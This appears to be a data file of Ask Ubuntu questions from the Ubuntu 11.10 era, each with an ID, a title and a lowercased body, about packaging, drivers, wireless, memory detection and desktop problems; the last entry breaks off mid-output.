82850	how can lintian warning `` diff-contains-git-control-dir '' be fixed without -i key ?	i have a simple project where i 'm experimenting with deb creating : https : //github.com/bessarabov/sample-deb i can create package with debuild , but i got lintian warning : w : sample source : diff-contains-git-control-dir .git and lintian is right . in the file sample_1.00.tar.gz i have content of the .git folder . there is a simple solution for this : i can run debuild -i and in this case there will be no .git/ in tar.gz . but i do n't like the idea to specify additional parameters in the command line . there is always a chance to forget to specify that parameters . but i hope there is some way i can place this parameter somewhere in debian/rules file . how can i fix this lintian warning when building package with debuild ?
82853	charts graphics software	i need to do a presentation of a product with charts ( pie and bar charts ) . i use libreoffice for documentation , but charts are not very beautiful . someone could recommend any software to generate charts ? it 's very important that charts will be beautiful , with 3d effect , gradients , etc . thanks
82860	how to install an ubuntu remix on a separate computer ?	i installed ubuntu 10.10 to my laptop . my friend says he wants a copy of ubuntu ( just like mine ) because i have already installed ubuntu-restricted extras , chromium , compiz , kde , cairo-dock , and much more cool open source software . so i installed remastersys and ran this command on terminal : sudo remastersys dist after that , i got an .iso file which i could use as a custom ubuntu distro . the problem is , how do i install that .iso file on my friend 's hard drive ? i am sure that ubiquity is not on my .iso file , so what other options do i have ?
82861	how to get rosegarden to work with timidity ?	i 'm having problems getting rosegarden to play midi using timidity on ubuntu 11.10 amd64 . i 've tried mapping the midi playback device to one of the timidity port that was automatically created on start up and that failed . i 've also tried manually starting timidity using the -ia option , and mapping the rosegarden 's midi playback device to one of the new ports , and that still failed . when i close rosegarden , i can hear one or two notes get played . would anyone know how i can get rosegarden to work again . thanks .
82862	window title bar and controls ( minimize , maximize and close ) do n't work sometimes	i am using ubuntu 11.10 . sometimes the window controls do n't work . if i click on any of the icons on top-right or top-left they just become colorless and fade away , as though that are not present . the window has not frozen , as i can click inside the window and continue to work with it . the moment i click inside the window the titlebar controls regain their color , but when i click them again , they fade and bcm colorless . as a result , i can not close , minimize or maximize . this is not a continuous problem , but happens very frequently .
82864	how to show the time and the date on the locked screen of gdm ?	how do i get a clock on the locked screen of gdm ? using 11.10 ( i have a bug in lightdm ) . when the screen is locked , it shows my wallpaper and the dialogue for the password . i would like to see the time and date there , even when nobody is logged in .
82866	problems with nvidia optimus card/intel sandy bridge	i have a laptop msi ge620dx ( intel core i5-2410m , 4gb ram , nvidia geforce gt 555m , 1366x768 hd ) with ubuntu 11.10 and windows 7 in multiboot . but i have problem with screen resoution in ubuntu - only 1024x768 or 800x600 . ubuntu did n't offer proprietary drivers in settings and i installed them manually : mvidia-common , nvidia-current ( 290.10 ) and nvidia-settings ( 290.10 ) . when i started sudo nvidia-settings control panel said you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run nvidia-xconfig as root ) , and restart the x server . i wrote sudo nvidia-xconfig but terminal said sudo : nvidia-xconfig : command not found what can i do for change screen resolution ? p. s. my full hardware list ( lshw ) : here .txt p. p. s. logs of xorg : grep -e `` ee|ww '' /var/log/xorg.0.log ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 23.575 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 23.576 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 23.576 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 23.576 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 23.653 ] ( ii ) loading extension mit-screen-saver [ 23.657 ] ( ww ) falling back to old probe method for fbdev [ 23.691 ] ( ww ) vesa ( 0 ) : unable to estimate virtual size [ 23.691 ] ( ww ) vesa ( 0 ) : no valid modes left . trying less strict filter ... [ 23.691 ] ( ww ) vesa ( 0 ) : unable to estimate virtual size [ 23.691 ] ( ww ) vesa ( 0 ) : no valid modes left . trying aggressive sync range ... [ 23.691 ] ( ww ) vesa ( 0 ) : unable to estimate virtual size p. p. p. s. my ubuntu starts only with nomodeset option , because without this option ubuntu does n't want to start . p. p. p. p. s. and in /etc/x11/ i ca n't find xorg.conf . it 's strange . please help .
82868	how do i set the resolution with a diamond ati radeon 9550 ?	i have ati radeon 9550 card , with the open drivers . in the display properties my screen is not detected , shows unknown , and do n't have 1152x864 which is best for me . how can i enable it ?
82870	can not install zram	i tried to install zram using following commands in terminal - sudo add-apt-repository ppa : shnatsel/zram sudo apt-get update sudo apt-get install zramswap-enabler but it throws the following error which says that the package is not available , e : could n't find package zramswap-enabler i could not even find any repository with name shnatsel/zram or similar in my system . as an alternative , i tried to install it from its deb file , which throws dependency error even though i have kernel 2.6.38-13-generic installed in my system . dependency error : error : dependency is not satisfiable : linux ( > = 2.6.37.1 ) |linux-image ( > = 2.6.37.1 ) |linux-generic ( > = 2.6.37.1 ) |linux-image-generic ( > = 2.6.37.1 ) |linux-image-generic-pae ( > = 2.6.37.1 ) |linux-server ( > = 2.6.37.1 ) |linux-virtual ( > = 2.6.37.1 ) |linux-image-server ( > = 2.6.37.1 ) |linux-image-virtual ( > = 2.6.37.1 ) is there any way to fix it ?
82873	giant battery consumption with dual graphics solution ( only i-gpu working )	i use a laptop with intel core i7 sandybridge and integrated intel hd3000 graphics as well as a nvidia geforce gts 555m . so far , i got the impression my laptop was running with the nvidia graphics adapter only because the fan was always running on highest speed ( and loudest noise ) and it was getting very hot even when doing nothing . also the battery is empty after ~40-50 minutes ( while having ~4-5 hours with intel graphics in win7 ) . since this ca n't be healthy i wanted to switch to the integrated graphics instead . i was fairly surprised when the system information showed me that the as graphics adapter i use `` intel m '' . why is my battery empty so fast with ubuntu ? without using the nvidia graphics adapter ? summary : i dont want to use the nvidia graphics adapter ( optimus ) , i just want the intel solution . as i have understood , the intel solution is running already , emptying my battery 10x as fast as win7 . what is wrong ? any ideas ?
82876	media autoplays when usb drive is opened from the unity menu	an annoying change i 've experienced upon upgrading to 11.10 is that when a usb device is opened from the unity menu , any media ( i.e . music and videos ) contained on it are autoplayed with whatever media player is my default . this is very rarely desirable , but i ca n't seem to find the option to turn it off ! note that i 've already checked the `` never prompt or start programs on media insertion '' box in system settings for removable media . the problem does n't occur when i insert the usb drive , only when i click the icon or select `` open '' from the unity menu ( everything 's fine if i open it within nautilus ) . am i missing something super obvious here ? thanks in advance !
82878	how to clean-up the unity menu ?	at some time i 've installed gnome shell . after some time of fiddling with it , i 've decided that i prefer unity , so i 've uninstalled it . now the unity menu is full of strange icons with no descriptions . there 's also some duplicates of programs , such as gimp or gedit . how do i clean my menu , and possibly my system of all that 's left behind by gnome ? here 's a screenshot : i 'm using 11.10/64 . please let me know if there 's more info i can provide .
82880	how do i set a system wide proxy with a username and password ?	i 'm trying to set a system wide proxy , and i 'm specifically having difficulties with apt-get for installing applications on my ubuntu . i 'm in a university using a proxy server with username/password . i 'm aware of setting a proxy with username and password in the following manner : http : //username : password @ proxy.thing.com:8080/ but it fails , as a critical example with apt-get . username contains backslash ( \ ) in it and i 'm wondering whether that could be a problem for failing . i 'd be grateful with any input on this .
82882	can not install rabbitvcs from ppa	i 'm trying to install rabbitvcs from its ppa ( required because of a bug ) but it wo n't : # aptitude install rabbitvcs-nautilus the following packages will be upgraded : rabbitvcs-nautilus { b } 1 packages upgraded , 0 newly installed , 0 to remove and 15 not upgraded . need to get 9,210 b of archives . after unpacking 4,096 b will be used . the following packages have unmet dependencies : rabbitvcs-nautilus : depends : nautilus ( < 1:3.0~ ) but 1:3.2.1-0ubuntu3.1 is installed . depends : python-nautilus ( < 1.0~ ) but 1.0-0ubuntu2 is installed . the solution aptitude offers it to remove about 100 core packages , which is of course not right . is there some way i can tell aptitude to just go ahead , try if it works with a slightly newer nautilus than specified . or is there something else wrong and should it normally just work ? ( i installed 11.10 when it was at rc level or something , but that should n't matter , right ? ) also , just to be sure , i tried apt-get as well . # apt-get install rabbitvcs-nautilus reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : rabbitvcs-nautilus : depends : nautilus ( < 1:3.0~ ) but 1:3.2.1-0ubuntu3.1 is to be installed depends : python-nautilus ( < 1.0~ ) but 1.0-0ubuntu2 is to be installed e : unable to correct problems , you have held broken packages . but i have n't held any packages , at least not according to aptitude search ~ahold .
82883	ubuntu 11.10 wo n't start after system update	well i have a big problem with ubuntu 11.10 i really really like it but unfortunately whenever i make the update it simply freezes on the violet screen at the beginning without any writing : s i 've reinstalled it three times here is my comp config core2duo 4go of ram ati radeon hd 5770 1go ( something idk tells me it come from its driver but not sure ) ubuntu 11.10 64 bits windows 7 also installed 6go of swap two dedicated ubuntu partitions one mounted as / and the other one as /home thanks a lot
82884	where can i download pretty extra templates for libreoffice impress ?	where can i download pretty extra templates for libreoffice impress or openoffice.org ?
82885	hp pavilion g6 1250 with a bcm 4313 does n't see any wireless networks	i have tried using ubuntu 10.04 and ubuntu 11.10 and both have the same problem the driver is detected by the additional propriety drivers wizard and after installation , ubuntu ca n't see except on wireless network which is not mine ( and i ca n't connect to it as it is secured ) there are plenty of wireless networks around me but ubuntu ca n't detect them and if i tried to connect to one of them as if it was hidden connection time out . the command lspci -nvn | grep -i net gives 04:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) 05:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 05 ) iwconfig gives lo no wireless extensions . eth0 no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=19 dbm retry long limit:7 rts thr : off fragment thr : off power management : off i guess it is something related to broadcom driver .. but i do n't know , any help will be appreciated update : ok i installed a new copy of 11.10 to remove the effect of any trials i have made i followed the link ( http : //askubuntu.com/q/67806 ) as suggested all what i have done now is trying the command lsmod | grep brc and it gave me the following brcmsmac 631693 0 brcmutil 17837 1 brcmsmac mac80211 310872 1 brcmsmac cfg80211 199587 2 brcmsmac , mac80211 crc_ccitt 12667 1 brcmsmac then i blacklisted all the other drivers as mentioned in the link the wireless is still disabled.. in the last installation installing the brodcom sta driver form the additional drivers enabled the menu but as i have said before it was n't able to connect or even get a list of available networks so what should i do now ? the output of command rfkill list all rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no
82887	can i have rhythmbox integration on dash in 11.10 ?	dash in 11.10 version uses banshee music database for searching music in the music lens . can i do sth similar with rhythmbox ?
82893	when i use gconf-editor to look for apps -- > gnome-power-manager that key does not appear	i am using 11.10 and i am trying to set it up so i can close the lid on a laptop and my external monitor stay on . i am new to ubuntu so please be specific .
82895	gnome shell crashing with 'purple haze ' effect	i 've just got gnome with 11.10 up and running with my netbook , and liked it so much i thought i 'd get my parents ' old machine sorted with ubuntu too . unity works fine but when i try to switch to gnome shell , i get problems . on login , the wallpaper appears as normal but then the colour bleeds out from the centre , leaving traces of it around the edge in a purple haze ( yes , i do like jimi hendrix but i 'm not making this up ) . when i go to applications , typing then pressing enter in the search field dumps me out so there 's nothing but file / edit / view etc in top left ; starting a program seems to work but then there 's only a white screen and no program window . gnome classic works fine , from the limited use i 've given it . i 'm using an asus desktop with abit motherboard , 2.6ghz with 1gb ram ; i 've checked drivers and it says i 'm up to date , nvidia graphics . anyone any ideas ?
82896	how could i install ubuntu one on kde and use it with dolphin ?	i see in some topics that to install ubuntu-one , i 've to execute these commands : sudo add-apt-repository ppa : apachelogger/ubuntuone-kde sudo apt-get update sudo apt-get install ubuntuone-kde however , it do n't work ( is ppa : apachelogger/ubuntuone-kde closed ? ) : sudo add-apt-repository ppa : apachelogger/ubuntuone-kde you are about to add the following ppa to your system : ubuntuone-kde tag : launchpad.net:2008 : redacted more info : https : //launchpad.net/~apachelogger/+archive/ubuntuone-kde press [ enter ] to continue or ctrl-c to cancel adding it executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /tmp/tmp.ujpbwwvbov -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver hkp : //keyserver.ubuntu.com:80/ -- recv tag : launchpad.net:2008 : redacted gpg : « tag : launchpad.net:2008 : redacted » n'est pas une id de clé : ignoré how could i install ubuntu-one on kde and use it with dolphin ?
82897	how to install a logitech c310 webcam ?	i bought a new logitech c310 webcam . i do n't know how to install it on ubuntu . i am trying to install this software through the terminal window . wine /media/lws_2_0/setup.exe but its showing as fixme : ole : tlb_readtypelib header type magic 0x00905a4d not supported . err : ole : tlb_readtypelib loading of typelib l '' z : \\media\\lws_2_1\\msetup.exe '' failed with error 0 and it opens a window with data as we have detected you have connected your webcam to a usb1.1 port , for the best performance and full feature set , we suggest using a usb2.0 port i tried this all the usb ports available in my system . it 's showing the same error . please tell me how to install this webcam on ubuntu 11.10 . thanks for reading . edit : the cam is working with all softwares like cheese which are available in software center , but the main problem is the webcam consists of controllers and effects by default along with the webcam if we install the software got along with the webcam . i already installed the same webcam on windows . it 's working fine with all effects and controllers like zoom out zoom in and pixel range selection , wide screen or standard and all these . but in ubuntu it 's just working without any control of those . if i want to go for 720p or 480p its not getting possible here . so this is the problem i got with this in ubuntu . does anyone know how it is possible to add those controls in ubuntu ?
82900	original silverlight in ubuntu ? ( moonlight not accepted from italian website )	i know about moonlight but it does n't work on an italian web site i need : http : //www.video.mediaset.it/video/motogp/full/258461/motogp-di-valencia.html . i 'm running chromium browser on ubuntu 11.10 , novell moonlight - version : 3.99.0.3 . i can not see a way to solve this problem other that reboot on windows 7 , if anybody can help . i wonder if there 's a way to install the original microsoft silverlight on linux . thanks .
82902	how can i add the 'shutdown ' and 'restart ' buttons in favorites in gnome shell ?	i recently switched from unity ( ubuntu 11.10 ) to the gnome shell . it took some tweaking to have it all to my liking , but one thing keeps bothering me : i can not find the 'shutdown ' and 'restart ' buttons in applications anymore , let alone place them in favorites ! in unity this was a piece of cake . i just opened the dash home and searched for 'shutdown ' or 'restart ' , and i could easily drag the buttons to the unity favorites on the left of the desktop . any thoughts on why gnome does n't even list these applications anymore ? and how to fix it ?
82904	logging of installation of packages	how can i log the installation of packages in ubuntu ? i want to send a message to log every time after a package is installed , like , `` package installed '' with the name of package & it should do that after uninstalling too . is this possible ? i am logging all this in a file called `` local3.log '' .
82906	ubuntu 11.10 not starting in graphical mode ?	i am in deep trouble . i am using ubuntu 11.10 in dual boot mode with xp . originally my touch pad was not working , ( sometimes ) . to fix that , i installed something . after reboot my ubuntu is not booting up ! ! i have several software pkgs already installed in past several weeks so reinstall of os is my last resort . can someone help me to get it rebooted in graphical mode ? i had followed the procedure mentioned in this thread as well . with that link , somehow i am able to restart in text mode . but no luck after that . i am not being able to go back on graphical mode . the important outputs of lspci are following : 00.00.0 host bridge : intel corporation mobile pm965/gm965/gl960 memory controller hub ( rev 0c ) 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 0c ) 00:02.0 display controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 0c ) i am attaching few snapshots , for more details on hardware .
82909	/dev/sdb2 : no such file or directory	i was trying to add a swap partition in my secondary drive , i created the partition space with fdisk and when running mkswap i was greeted with an error : $ sudo mkswap -c /dev/sdb2 /dev/sdb2 : no such file or directory in fact the device does n't exist : $ ls /dev/sda* /dev/sda /dev/sda1 /dev/sda2 /dev/sda5 $ ls /dev/sdb* /dev/sdb /dev/sdb1 fdisk confirms me that the partition exists : $ sudo fdisk /dev/sdb command ( m for help ) : p disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 2048 419432447 209715200 83 linux /dev/sdb2 419432448 429918207 5242880 82 linux swap / solaris i 'm running ubuntu 11.10 , i thought that udev would manage the devices automatically , should i still use makedev , or there is a new method to handle this problem ?
82917	ubuntu detects only 3.2gb ram on a 64bit os	i have been running 64 bit version of 11.10 which was upgraded from 11.04 and was n't a fresh install . i earlier had 2gb of ram and just today i added 4gb of more ram making it a total of 6gb but only 3.2gb is usable . the bios detects it fine and shows 6gb . even lshw shows 6gb memory but somehow only 3.2gb is usable . output of uname -a ashfame @ ashfame-desktop : ~ $ uname -a linux ashfame-desktop 3.0.0-13-generic # 22-ubuntu smp wed nov 2 13:27:26 utc 2011 x86_64 x86_64 x86_64 gnu/linux output of free -m ashfame @ ashfame-desktop : ~ $ free -m total used free shared buffers cached mem : 3268 2304 963 0 134 969 -/+ buffers/cache : 1201 2066 swap : 2027 0 2027 output of lshw ashfame-desktop description : desktop computer product : ( ) width : 64 bits capabilities : smbios-2.4 dmi-2.4 vsyscall64 vsyscall32 configuration : boot=normal chassis=desktop uuid=95649fa0-34ef-11dc-b2ff-000ea6292a3d *-core description : motherboard product : dg965ry vendor : intel corporation physical id : 0 version : aad41691-301 serial : btry728008rn slot : base board chassis location *-cpu description : cpu product : intel ( r ) core ( tm ) 2 cpu 4400 @ 2.00ghz vendor : intel corp. physical id : 0 bus info : cpu @ 0 version : intel ( r ) core ( tm ) 2 cpu 4400 @ 2.00ghz slot : lga 775 size : 2ghz capacity : 4ghz width : 64 bits clock : 200mhz capabilities : fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx x86-64 constant_tsc arch_perfmon pebs bts rep_good nopl aperfmperf pni dtes64 monitor ds_cpl est tm2 ssse3 cx16 xtpr pdcm lahf_lm cpufreq *-cache:0 description : l2 cache physical id : 1 slot : unknown size : 2mib capacity : 2mib capabilities : asynchronous internal write-back unified *-cache:1 description : l1 cache physical id : 3 slot : unknown size : 32kib capacity : 32kib capabilities : asynchronous internal write-back data *-cache description : l1 cache physical id : 2 slot : unknown size : 32kib capacity : 32kib capabilities : asynchronous internal write-back instruction *-firmware description : bios vendor : intel corp. physical id : 4 version : mq96510j.86a.1687.2007.0510.0258 date : 05/10/2007 size : 64kib capacity : 960kib capabilities : pci upgrade shadowing cdboot bootselect edd int9keyboard int14serial int17printer int10video acpi usb zipboot biosbootspecification netboot *-memory description : system memory physical id : 17 slot : system board or motherboard size : 6gib *-bank:0 description : dimm ddr2 synchronous 667 mhz ( 1.5 ns ) product : ocz2n800sr1g vendor : 0x7f7f7f7fb0000000 physical id : 0 serial : 0xffffffff slot : j6h1 size : 1gib width : 64 bits clock : 667mhz ( 1.5ns ) *-bank:1 description : dimm ddr2 synchronous 667 mhz ( 1.5 ns ) product : nt2gt64u8hd0by-ad vendor : nanya technology physical id : 1 serial : 0xcb901004 slot : j6h2 size : 2gib width : 64 bits clock : 667mhz ( 1.5ns ) *-bank:2 description : dimm ddr2 synchronous 667 mhz ( 1.5 ns ) product : ocz2n800sr1g vendor : 0x7f7f7f7fb0000000 physical id : 2 serial : 0xffffffff slot : j6j1 size : 1gib width : 64 bits clock : 667mhz ( 1.5ns ) *-bank:3 description : dimm ddr2 synchronous 667 mhz ( 1.5 ns ) product : nt2gt64u8hd0by-ad vendor : nanya technology physical id : 3 serial : 0x1b911003 slot : j6j2 size : 2gib width : 64 bits clock : 667mhz ( 1.5ns ) *-pci description : host bridge product : 82p965/g965 memory controller hub vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 02 width : 32 bits clock : 33mhz *-pci:0 description : pci bridge product : 82p965/g965 pci express root port vendor : intel corporation physical id : 1 bus info : pci @ 0000:00:01.0 version : 02 width : 32 bits clock : 33mhz capabilities : pci pm msi pciexpress normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:40 ioport:2000 ( size=4096 ) memory : e0200000-e02fffff ioport : d0000000 ( size=268435456 ) *-display description : vga compatible controller product : rv770 [ radeon hd 4850 ] vendor : ati technologies inc physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=fglrx_pci latency=0 resources : irq:50 memory : d0000000-dfffffff memory : e0200000-e020ffff ioport:2000 ( size=256 ) memory : e0220000-e023ffff *-multimedia description : audio device product : hd48x0 audio vendor : ati technologies inc physical id : 0.1 bus info : pci @ 0000:01:00.1 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi bus_master cap_list configuration : driver=hda intel latency=0 resources : irq:49 memory : e0210000-e0213fff *-communication description : communication controller product : 82p965/g965 heci controller vendor : intel corporation physical id : 3 bus info : pci @ 0000:00:03.0 version : 02 width : 64 bits clock : 33mhz capabilities : pm msi bus_master cap_list configuration : driver=mei latency=0 resources : irq:16 memory : e0326100-e032610f *-network description : ethernet interface product : 82566dc gigabit network connection vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 logical name : eth1 version : 02 serial : 00:19 : d1:93 : ad:2f size : 100mbit/s capacity : 1gbit/s width : 32 bits clock : 33mhz capabilities : pm msi bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000e driverversion=1.3.10-k2 duplex=full firmware=1.1-0 ip=192.168.1.2 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:47 memory : e0300000-e031ffff memory : e0324000-e0324fff ioport:30e0 ( size=32 ) *-usb:0 description : usb controller product : 82801h ( ich8 family ) usb uhci controller # 4 vendor : intel corporation physical id : 1a bus info : pci @ 0000:00:1a.0 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:16 ioport:30c0 ( size=32 ) *-usb:1 description : usb controller product : 82801h ( ich8 family ) usb uhci controller # 5 vendor : intel corporation physical id : 1a.1 bus info : pci @ 0000:00:1a.1 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:21 ioport:30a0 ( size=32 ) *-usb:2 description : usb controller product : 82801h ( ich8 family ) usb2 ehci controller # 2 vendor : intel corporation physical id : 1a.7 bus info : pci @ 0000:00:1a.7 version : 02 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:18 memory : e0325c00-e0325fff *-multimedia description : audio device product : 82801h ( ich8 family ) hd audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 02 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=hda intel latency=0 resources : irq:48 memory : e0320000-e0323fff *-pci:1 description : pci bridge product : 82801h ( ich8 family ) pci express port 1 vendor : intel corporation physical id : 1c bus info : pci @ 0000:00:1c.0 version : 02 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:41 ioport:7000 ( size=4096 ) memory : e1200000-e13fffff ioport : e1400000 ( size=2097152 ) *-pci:2 description : pci bridge product : 82801h ( ich8 family ) pci express port 2 vendor : intel corporation physical id : 1c.1 bus info : pci @ 0000:00:1c.1 version : 02 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:42 ioport:1000 ( size=4096 ) memory : e0100000-e01fffff ioport : e1000000 ( size=2097152 ) *-ide description : ide interface product : 88se6101/6102 single-port pata133 interface vendor : marvell technology group ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : scsi0 version : b1 width : 32 bits clock : 33mhz capabilities : ide pm msi pciexpress bus_master cap_list emulated configuration : driver=pata_marvell latency=0 resources : irq:17 ioport:1018 ( size=8 ) ioport:1024 ( size=4 ) ioport:1010 ( size=8 ) ioport:1020 ( size=4 ) ioport:1000 ( size=16 ) memory : e0100000-e01001ff *-cdrom description : dvd-ram writer product : dvd rw aw-g170a vendor : sony physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/scd0 logical name : /dev/sr0 version : 1.62 serial : [ capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc *-pci:3 description : pci bridge product : 82801h ( ich8 family ) pci express port 3 vendor : intel corporation physical id : 1c.2 bus info : pci @ 0000:00:1c.2 version : 02 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:43 ioport:6000 ( size=4096 ) memory : e0c00000-e0dfffff ioport : e0e00000 ( size=2097152 ) *-pci:4 description : pci bridge product : 82801h ( ich8 family ) pci express port 4 vendor : intel corporation physical id : 1c.3 bus info : pci @ 0000:00:1c.3 version : 02 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:44 ioport:5000 ( size=4096 ) memory : e0800000-e09fffff ioport : e0a00000 ( size=2097152 ) *-pci:5 description : pci bridge product : 82801h ( ich8 family ) pci express port 5 vendor : intel corporation physical id : 1c.4 bus info : pci @ 0000:00:1c.4 version : 02 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:45 ioport:4000 ( size=4096 ) memory : e0400000-e05fffff ioport : e0600000 ( size=2097152 ) *-usb:3 description : usb controller product : 82801h ( ich8 family ) usb uhci controller # 1 vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:23 ioport:3080 ( size=32 ) *-usb:4 description : usb controller product : 82801h ( ich8 family ) usb uhci controller # 2 vendor : intel corporation physical id : 1d.1 bus info : pci @ 0000:00:1d.1 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:19 ioport:3060 ( size=32 ) *-usb:5 description : usb controller product : 82801h ( ich8 family ) usb uhci controller # 3 vendor : intel corporation physical id : 1d.2 bus info : pci @ 0000:00:1d.2 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:18 ioport:3040 ( size=32 ) *-usb:6 description : usb controller product : 82801h ( ich8 family ) usb2 ehci controller # 1 vendor : intel corporation physical id : 1d.7 bus info : pci @ 0000:00:1d.7 version : 02 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:23 memory : e0325800-e0325bff *-pci:6 description : pci bridge product : 82801 pci bridge vendor : intel corporation physical id : 1e bus info : pci @ 0000:00:1e.0 version : f2 width : 32 bits clock : 33mhz capabilities : pci subtractive_decode bus_master cap_list resources : memory : e0000000-e00fffff *-firewire description : firewire ( ieee 1394 ) product : tsb43ab22a ieee-1394a-2000 controller ( phy/link ) [ iohci-lynx ] vendor : texas instruments physical id : 3 bus info : pci @ 0000:07:03.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm ohci bus_master cap_list configuration : driver=firewire_ohci latency=32 maxlatency=4 mingnt=2 resources : irq:19 memory : e0004000-e00047ff memory : e0000000-e0003fff *-isa description : isa bridge product : 82801hb/hr ( ich8/r ) lpc interface controller vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 02 width : 32 bits clock : 33mhz capabilities : isa bus_master cap_list configuration : latency=0 *-storage description : sata controller product : 82801hb ( ich8 ) 4 port sata ahci controller vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 logical name : scsi1 version : 02 width : 32 bits clock : 66mhz capabilities : storage msi pm ahci_1.0 bus_master cap_list emulated configuration : driver=ahci latency=0 resources : irq:46 ioport:3408 ( size=8 ) ioport:3414 ( size=4 ) ioport:3400 ( size=8 ) ioport:3410 ( size=4 ) ioport:3020 ( size=32 ) memory : e0325000-e03257ff *-disk description : ata disk product : st3160215as vendor : seagate physical id : 0.0.0 bus info : scsi @ 1:0.0.0 logical name : /dev/sda version : 3.aa serial : 5rx16vwr size : 149gib ( 160gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 signature=00090294 *-volume:0 description : ext4 volume vendor : linux physical id : 1 bus info : scsi @ 1:0.0.0,1 logical name : /dev/sda1 logical name : / version : 1.0 serial : 6c158778-6562-40f5-9f4f-1d49d9d68b13 size : 147gib capacity : 147gib capabilities : primary bootable journaled extended_attributes large_files huge_files dir_nlink extents ext4 ext2 initialized configuration : created=2011-05-01 10:12:11 filesystem=ext4 lastmountpoint=/ modified=2011-11-26 20:37:01 mount.fstype=ext4 mount.options=rw , relatime , errors=remount-ro , user_xattr , acl , barrier=1 , data=ordered mounted=2011-11-26 20:37:47 state=mounted *-volume:1 description : extended partition physical id : 2 bus info : scsi @ 1:0.0.0,2 logical name : /dev/sda2 size : 2028mib capacity : 2028mib capabilities : primary extended partitioned partitioned : extended *-logicalvolume description : linux swap / solaris partition physical id : 5 logical name : /dev/sda5 capacity : 2028mib capabilities : nofs *-serial unclaimed description : smbus product : 82801h ( ich8 family ) smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 02 width : 32 bits clock : 33mhz configuration : latency=0 resources : memory : e0326000-e03260ff ioport:3000 ( size=32 ) output of cat /proc/meminfo ashfame @ ashfame-desktop : ~ $ cat /proc/meminfo memtotal : 3346872 kb memfree : 1152164 kb buffers : 22152 kb cached : 871740 kb swapcached : 320 kb active : 1355716 kb inactive : 407872 kb active ( anon ) : 695948 kb inactive ( anon ) : 183108 kb active ( file ) : 659768 kb inactive ( file ) : 224764 kb unevictable : 248 kb mlocked : 